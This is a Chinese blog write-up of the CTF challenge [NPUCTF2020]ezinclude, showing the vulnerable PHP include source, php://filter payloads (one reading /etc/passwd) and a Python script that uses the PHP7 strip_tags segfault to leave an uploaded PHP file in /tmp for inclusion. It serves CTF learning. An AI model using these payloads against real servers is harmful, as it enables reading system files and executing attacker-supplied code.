[NPUCTF2020]ezinclude 1

于 2022-03-03 18:13:50 发布
阅读量462 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123259453
版权 
知识点:php7 segment fault特性:

php7 segment fault特性:

原理:向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留
php < 7.2
php://filter/string.strip_tags/resource=/etc/passwd

php7 老版本通杀
php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA

我们输入name,passwd传参
在这里插入图片描述
然后可以看到它返回的一个hash参数,然后再把hash写入passwd
在这里插入图片描述
利用伪协议来读fll文件

flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php


<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

是个文件包含,然后用PHP7的segment fault特性来在/tmp下创建包含phpinfo的临时文件,
在这里插入图片描述
然后flflflflag.php?file=/tmp/phpJzYDGk下找flag,要用bp抓包看

import requests
from io import BytesIO
url = "http://268a39e5-74d4-4096-a9b8-da2afe17409b.node4.buuoj.cn:81//flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload="<?php phpinfo();?>"
files={
    "file":BytesIO(payload.encode())
}
r = requests.post(url=url, files=files, allow_redirects=False)

print(r.text)

在这里插入图片描述

参考

1
2

succ3
关注
专栏目录
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]ezinclude
pakho_C的博客
09-16 1254
利用php7 segment fault特性(CVE-2018-14884) php代码中使用php://filter的strip_tags 过滤器, 可以让 php 执行的时候直接出现 Segment Fault , 这样 php的垃圾回收机制就不会在继续执行 , 导致 POST的文件会保存在系统的缓存目录下不会被清除而不像phpinfo那样上传的文件很快就会被删除,这样的情况下我们只需要知道其文件名就可以包含我们的恶意代码。也可以直接在脚本中写入
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
解读“模块的沟通”
08-04
例如,如果模块A在时钟上升沿将信号Done设置为1,模块B不能立即在同一个时钟周期内检测到Done信号的变化,而是在下一个时钟周期才能看到Done信号为1。 下面通过一个具体的例子来进一步阐述这个问题: 假设我们有两...
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
BUUCTF--[NPUCTF2020]ezinclude
qq_46263951的博客
07-18 1593
进入页面后F12查看网页源码,根据提示我们可以知道经过md5编码后的name要与pass相同 经过测试可以发现name没有参数时和name有参数是的Hash值是不同的,猜测这里是将name编码后的值赋给了Hash 令name=1,pass为name为1时的Hash值即可,但发现直接跳转到404页面 这里需要使用BP拦截,可以看到给出一个php文件 打开后发现是个文件包含 ...
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4982
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
Web-11(41-44)-BUUCTF平台
~airrudder~
07-09 928
本篇内容 [NPUCTF2020]ReadlezPHP [NPUCTF2020]ezlogin [NPUCTF2020]ezinclude [NPUCTF2020]验证???? [NPUCTF2020]web???? [NPUCTF2020]EzShiro 上一篇 | 目录 | 下一篇 [NPUCTF2020]ReadlezPHP 直接加view-source:查看源代码: <?php #err...
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 767
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include,文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
[NPUCTF2020]ezlogin
怪味巧克力的博客
07-16 1237
0x01 首页如上,是一个登录的页面,而且这个页面是有时间限制的,超过一定时间没登录就需要刷新页面重新登录。我们抓包看看 登录的时候一个session只能存在一定的时间,通过抓包的内容来看,这里要用到Xpath的知识点 关于Xpath参考https://www.cnblogs.com/backlion/p/8554749.html xpath注入主要有两种,一种是普通的注入,另外一种是布尔注入。普通注入对应union注入,使用|来完成和union类似的功能,布尔注入则是布尔盲注。 这里使用大佬的脚本爆破
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
最新发布
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值